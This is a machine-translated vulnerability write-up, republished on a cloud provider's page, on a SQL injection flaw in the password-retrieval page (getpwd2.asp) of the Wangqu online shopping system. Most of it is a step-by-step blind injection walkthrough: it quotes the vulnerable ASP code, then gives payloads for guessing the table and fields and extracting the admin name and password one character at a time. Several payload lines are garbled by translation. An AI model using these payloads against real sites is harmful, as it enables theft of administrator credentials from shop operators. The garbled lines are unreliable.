Analysis of SQL injection vulnerability in Online Shopping System of Wangqu

Source: Internet
Author: User

Author: cnryan @ http://hi.baidu.com/cnryan

Wangqu Online Shopping System is a simple, powerful, and most widely used online shopping shop platform. with years of Online Shopping System R & D experience, the Online Shopping System of Wangqu has become the preferred brand for many users to shop online because of the increasingly powerful and complete software functions and the large user base.

This is the official example.
This SQL injection occurs in password retrieval. The latest version of 9.4 also has a vulnerability, and subsequent tests on versions earlier than v9.0 all have a vulnerability.

Vulnerability page: getpwd2.asp

Vulnerability code:
<%
Username = request. form ("username ")
Set rs = Server. CreateObject ("Adodb. Recordset ")
SQL = "select * from [user] where username =" & username &""
Rs. open SQL, conn, 1, 1
If rs. eof Then
%>

The typical injection is similar to the previous Online Shopping System.

Http: // 127.0.0.1/cnhww9.4/getpwd. asp
Getpwd. asp is the password retrieval page, and the user name entered is handed over to getpwd2.asp. If the user name exists in step 2, exit

Enter test and 1 = 1 and =
Jump to step 2 of getpwd2.asp

Enter test and 1 = 2 and =
This user is not prompted


Guess the table-> cnhww

Test and exists (select * from [admin]) and 1 = 1 F
Test and exists (select * from [cnhww]) and 1 = 1 T


Field-> admin password
Test and exists (select admin from [cnhww]) and 1 = 1 T
Test and exists (select password from [cnhww]) and 1 = 1 T

Value -->
Test and (select top 1 asc (mid (admin, 1,1) from cnhww)> 97 and 1 = 1 F
Test and (select top 1 asc (mid (admin, 1, 1) from cnhww)> 96 and 1 = 1 T
97 =
Test and (select top 1 asc (mid (admin, 100) from cnhww)> and 1 = 1 F
Test and (select top 1 asc (mid (admin, 2, 1) from cnhww)> 99 and 1 = 1 T
100 = d

......


Test and (select top 1 asc (mid (password, 1, 1) from cnhww)> 55 and 1 = 1

......

......

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.